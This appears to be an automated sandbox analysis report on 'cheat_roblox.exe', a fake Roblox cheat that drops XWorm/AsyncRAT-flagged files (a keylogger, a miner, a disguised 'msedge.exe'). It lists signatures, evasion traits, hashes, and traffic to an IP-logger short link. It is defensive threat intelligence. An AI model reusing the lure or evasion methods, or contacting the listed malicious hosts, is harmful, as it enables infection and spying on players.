Windows Analysis Report
cheat_roblox.exe

Overview

General Information

Sample name:cheat_roblox.exe
Analysis ID:1484385
MD5:d49b1a211ce49bed3e766471501819c6
SHA1:ed8f8b0d45ad556115c14a00247c080fa82d56e9
SHA256:1673b4f5f2d5ae3e3d2c5816534bf904ed1d2653b4a40bbb2a320231eca8259a
Tags:exe
Infos:

Detection

XWorm
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • cheat_roblox.exe (PID: 3192 cmdline: "C:\Users\user\Desktop\cheat_roblox.exe" MD5: D49B1A211CE49BED3E766471501819C6)
    • cmd.exe (PID: 4180 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5020 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 6712 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 3136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 --field-trial-handle=1980,i,3286908272416009532,3896627819344561856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • RobloxPlayerInstaller.exe (PID: 1220 cmdline: "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe" MD5: 27469372591B14FF1C57654FACB5E020)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\ msedge.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\ msedge.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
    • 0x7df8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7e95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7faa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7aa6:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\Keyloger.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\Keyloger.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
    • 0xf0e7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xf184:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xf299:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xdb4c:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
Source | Rule | Description | Author | Strings
00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
    • 0x7d38:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7dd5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7eea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x79e6:$cnc4: POST / HTTP/1.1
Process Memory Space: cheat_roblox.exe PID: 3192 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
            No Sigma rule has matched
            No Snort rule has matched
            Timestamp:2024-07-30T00:56:50.218743+0200
            SID:2022930
            Source Port:443
            Destination Port:49730
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-30T00:57:27.842535+0200
            SID:2022930
            Source Port:443
            Destination Port:49753
            Protocol:TCP
            Classtype:A Network Trojan was detected

            AV Detection

            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeAvira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeAvira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeAvira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeReversingLabs: Detection: 81%
            Source: cheat_roblox.exeReversingLabs: Detection: 59%
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeJoe Sandbox ML: detected
            Source: cheat_roblox.exeJoe Sandbox ML: detected
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_f3f82e14-9
            Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49738 version: TLS 1.0
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeFile created: C:\Users\user\AppData\Local\Roblox\logs\RobloxPlayerInstaller_2ACC2.log
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.6:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.6:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58797 version: TLS 1.2
            Source: cheat_roblox.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: Google.Widevine.CDM.dll.pdb source: Google.Widevine.CDM.dll.8.dr
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD565E9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: cheat_roblox.exe
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E7B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF693E7B190
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E640BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF693E640BC
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E8FCA0 FindFirstFileExA,0_2_00007FF693E8FCA0
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\coin.bat
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Keyloger.exe
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Roblox
            Source: global trafficTCP traffic: 192.168.2.6:58786 -> 1.1.1.1:53
            Source: Joe Sandbox ViewIP Address: 88.212.201.198 88.212.201.198
            Source: Joe Sandbox ViewIP Address: 104.21.79.229 104.21.79.229
            Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49738 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: global trafficHTTP traffic detected: GET /24RXx6 HTTP/1.1Host: 2no.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Sh9hBMxfPmon+V7&MD=w1bAu+gC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /redirect/handshake.png HTTP/1.1Host: cdn.iplogger.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 HTTP/1.1Host: counter.yadro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 HTTP/1.1Host: counter.yadro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FTID=1cg1uo1y3WOr1cg1uo00241O
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdn.iplogger.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 HTTP/1.1Host: counter.yadro.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FTID=1cg1uo1y3WOr1cg1uo00241O; VID=2DNPIG0nbdur1cg1uq002NPY
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdn.iplogger.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Sh9hBMxfPmon+V7&MD=w1bAu+gC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficDNS traffic detected: DNS query: client-telemetry.roblox.com
            Source: global trafficDNS traffic detected: DNS query: ecsv2.roblox.com
            Source: global trafficDNS traffic detected: DNS query: clientsettingscdn.roblox.com
            Source: global trafficDNS traffic detected: DNS query: 2no.co
            Source: global trafficDNS traffic detected: DNS query: cdn.iplogger.org
            Source: global trafficDNS traffic detected: DNS query: counter.yadro.ru
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900C4F3X-BM-CBT: 1696488253X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 1D6F504B5A5A465DBDB84F31C63A581DX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900C4F3X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshldspcl40,msbdsborgv2co,msbwdsbi920cf,optfsth3,premsbdsbchtupcf,wsbfixcachec,wsbqfasmsall_c,wsbqfminiserp_c,wsbref-cX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. 
Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 516Connection: Keep-AliveCache-Control: no-cacheCookie: SRCHUID=V=2&GUID=CE2BE0509FF742BD822F50D98AD10391&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&HV=1696488191&IPMH=5767d621&IPMID=1696488252989&LUT=1696487541024; CortanaAppUID=2020E25DAB158E420BA06F1C8DEF7959; MUID=81C61E09498D41CC97CDBBA354824ED1; _SS=SID=1D9FAF807E686D422B86BC217FC66C71&CPID=1696488253968&AC=1&CPH=071f2185; _EDGE_S=SID=1D9FAF807E686D422B86BC217FC66C71; MUIDB=81C61E09498D41CC97CDBBA354824ED1
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 29 Jul 2024 22:56:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://bit.ly/1eMQ42U
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
            Source: sets.json.8.drString found in binary or memory: https://deccoria.pl
            Source: sets.json.8.drString found in binary or memory: https://deere.com
            Source: sets.json.8.drString found in binary or memory: https://desimartini.com
            Source: sets.json.8.drString found in binary or memory: https://dewarmsteweek.be
            Source: sets.json.8.drString found in binary or memory: https://economictimes.com
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815554825.000000000285F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809388859.000000000285C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810473201.000000000285F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecsv2.roblox.com/client/pbe
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchS
